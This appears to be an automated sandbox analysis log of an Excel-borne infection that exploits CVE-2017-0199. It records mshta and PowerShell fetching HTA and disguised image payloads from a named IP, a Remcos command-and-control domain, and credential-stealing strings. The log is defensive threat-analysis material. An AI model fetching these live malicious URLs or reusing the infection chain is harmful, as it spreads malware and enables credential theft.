                Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49163
                Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 95.217.202.210:443
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global traffic | TCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166

                Networking

                Source: Network traffic | Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 185.235.137.223:80
                Source: Network traffic | Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 185.235.137.223:80
                Source: Network traffic | Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 185.235.137.223:80 -> 192.168.2.22:49166
                Source: Network traffic | Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 185.235.137.223:80 -> 192.168.2.22:49164
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49171 -> 192.3.101.29:14645
                Source: Network traffic | Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 185.235.137.223:80 -> 192.168.2.22:49169
                Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 185.235.137.223:80 -> 192.168.2.22:49169
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49170 -> 192.3.101.29:14645
                Source: Network traffic | Suricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.227.96:443 -> 192.168.2.22:49168
                Source: Malware configuration extractor | URLs: camzeroconnect.duckdns.org
                Source: unknown | DNS query: name: camzeroconnect.duckdns.org
                Source: global traffic | HTTP traffic detected: GET /2/items/new_image_20240905/new_image.jpg HTTP/1.1Host: ia601706.us.archive.orgConnection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /200/NRSCER.txt HTTP/1.1Host: 185.235.137.223Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox View | IP Address: 192.3.101.29 192.3.101.29
                Source: Joe Sandbox View | IP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox View | ASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
                Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                Source: Joe Sandbox View | ASN Name: AFRARASAIR AFRARASAIR
                Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49172 -> 178.237.33.50:80
                Source: global traffic | HTTP traffic detected: GET /yDfvh HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zeep.lyConnection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /yDfvh HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zeep.lyConnection: Keep-AliveCookie: short_478567=1
                Source: global traffic | HTTP traffic detected: GET /xampp/ceo/IEnetcateudpationprocess.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.235.137.223Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /xampp/ceo/IEnetcateudpationprocess.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.235.137.223Connection: Keep-AliveRange: bytes=8896-If-Range: "24cb3-621aa877cb395"
                Source: global traffic | HTTP traffic detected: GET /200/pictureupdatedwithnewquality.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.235.137.223Connection: Keep-Alive
                Source: unknown | HTTPS traffic detected: 207.241.227.96:443 -> 192.168.2.22:49168 version: TLS 1.0
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: unknownTCP traffic detected without corresponding DNS query: 185.235.137.223
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE898B7018 URLDownloadToFileW,7_2_000007FE898B7018
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A84408C8.emf
                Source: global trafficHTTP traffic detected: GET /yDfvh HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zeep.lyConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /yDfvh HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zeep.lyConnection: Keep-AliveCookie: short_478567=1
                Source: global trafficHTTP traffic detected: GET /2/items/new_image_20240905/new_image.jpg HTTP/1.1Host: ia601706.us.archive.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xampp/ceo/IEnetcateudpationprocess.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.235.137.223Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xampp/ceo/IEnetcateudpationprocess.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.235.137.223Connection: Keep-AliveRange: bytes=8896-If-Range: "24cb3-621aa877cb395"
                Source: global trafficHTTP traffic detected: GET /200/pictureupdatedwithnewquality.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.235.137.223Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /200/NRSCER.txt HTTP/1.1Host: 185.235.137.223Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: bhv1E0C.tmp.21.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                Source: RegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                Source: RegAsm.exe, RegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: RegAsm.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: bhv1E0C.tmp.21.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                Source: mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: RegAsm.exe, 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: RegAsm.exe, 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: zeep.ly
                Source: global trafficDNS traffic detected: DNS query: ia601706.us.archive.org
                Source: global trafficDNS traffic detected: DNS query: camzeroconnect.duckdns.org
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: powershell.exe, 0000000E.00000002.505047293.0000000003277000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223
                Source: mshta.exe, 00000004.00000003.474232984.0000000003752000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.0000000003752000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.0000000003752000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/
                Source: powershell.exe, 0000000E.00000002.505047293.0000000003277000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.505047293.0000000002785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/200/NRSCER.txt
                Source: powershell.exe, 0000000E.00000002.505047293.0000000003277000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/200/Nh
                Source: powershell.exe, 00000007.00000002.490691993.0000000002730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/200/pictu
                Source: powershell.exe, 00000007.00000002.490691993.0000000002730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C1A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.495961641.000000001A550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/200/pictureupdatedwithnewquality.tIF
                Source: powershell.exe, 00000007.00000002.490691993.0000000002730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/200/pictureupdatedwithnewquality.tIFp
                Source: mshta.exe, 00000004.00000003.474574663.0000000000503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.hta
                Source: mshta.exe, 00000004.00000003.475715183.0000000000503000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476106334.0000000000503000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474272874.0000000000503000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474574663.0000000000503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.hta...
